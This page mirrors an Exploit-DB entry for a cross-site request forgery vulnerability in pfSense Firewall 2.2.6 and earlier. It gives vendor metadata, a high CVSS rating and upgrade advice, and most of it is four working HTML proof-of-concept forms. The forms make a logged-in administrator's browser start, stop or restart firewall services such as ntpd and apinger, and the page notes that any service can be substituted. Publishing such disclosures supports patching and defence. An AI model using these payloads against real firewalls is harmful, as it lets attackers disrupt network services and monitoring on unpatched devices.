pfSense Firewall - exploit.company

vendor:

pfSense Firewall

by:

Aatif Shahdad

7,5

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: pfSense Firewall

Affected Version From: 2.2.6 and below.

Affected Version To: 2.2.6 and below.

Patch Exists: YES

Related CWE: N/A

CPE: pfsense

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

pfSense Firewall <= 2.2.6 Cross-Site Request Forgery

An attacker can coerce a logged-in victim's browser to issue requests that will start/stop/restart services on the Firewall.

Mitigation:

Upgrading to the latest version of pfSense Firewall will fix this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: pfSense Firewall <= 2.2.6 Cross-Site Request Forgery 
# Exploit Author: Aatif Shahdad
# Software Link: http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz
# Version: 2.2.6 and below.
# Contact: https://twitter.com/61617469665f736
# Category: webapps


1. Description

An attacker can coerce a logged-in victim's browser to issue requests that will start/stop/restart services on the Firewall. 


2. Proof of Concept

Login to the Web Console, for example, http://192.168.0.1 (set at the time of install) and  open the following POC’s:


Start NTPD service:

<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="startservice" />
     <input type="hidden" name="service" value="ntpd" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>


Stop NTPD service:

<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="stopservice" />
     <input type="hidden" name="service" value="ntpd" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>



Restart NTPD service:

POC:
<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="restartservice" />
     <input type="hidden" name="service" value="ntpd" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>

The service will automatically start/stop. 

Note: That NTPD service can be replaced with any service running on the Firewall. For example, to stop the APINGER (gateway monitoring daemon) service, use the following POC:

<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="stopservice" />
     <input type="hidden" name="service" value="apinger" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>



3. Solution:

Upgrade to version 2.3 at https://www.pfsense.org/download/mirror.php?section=downloads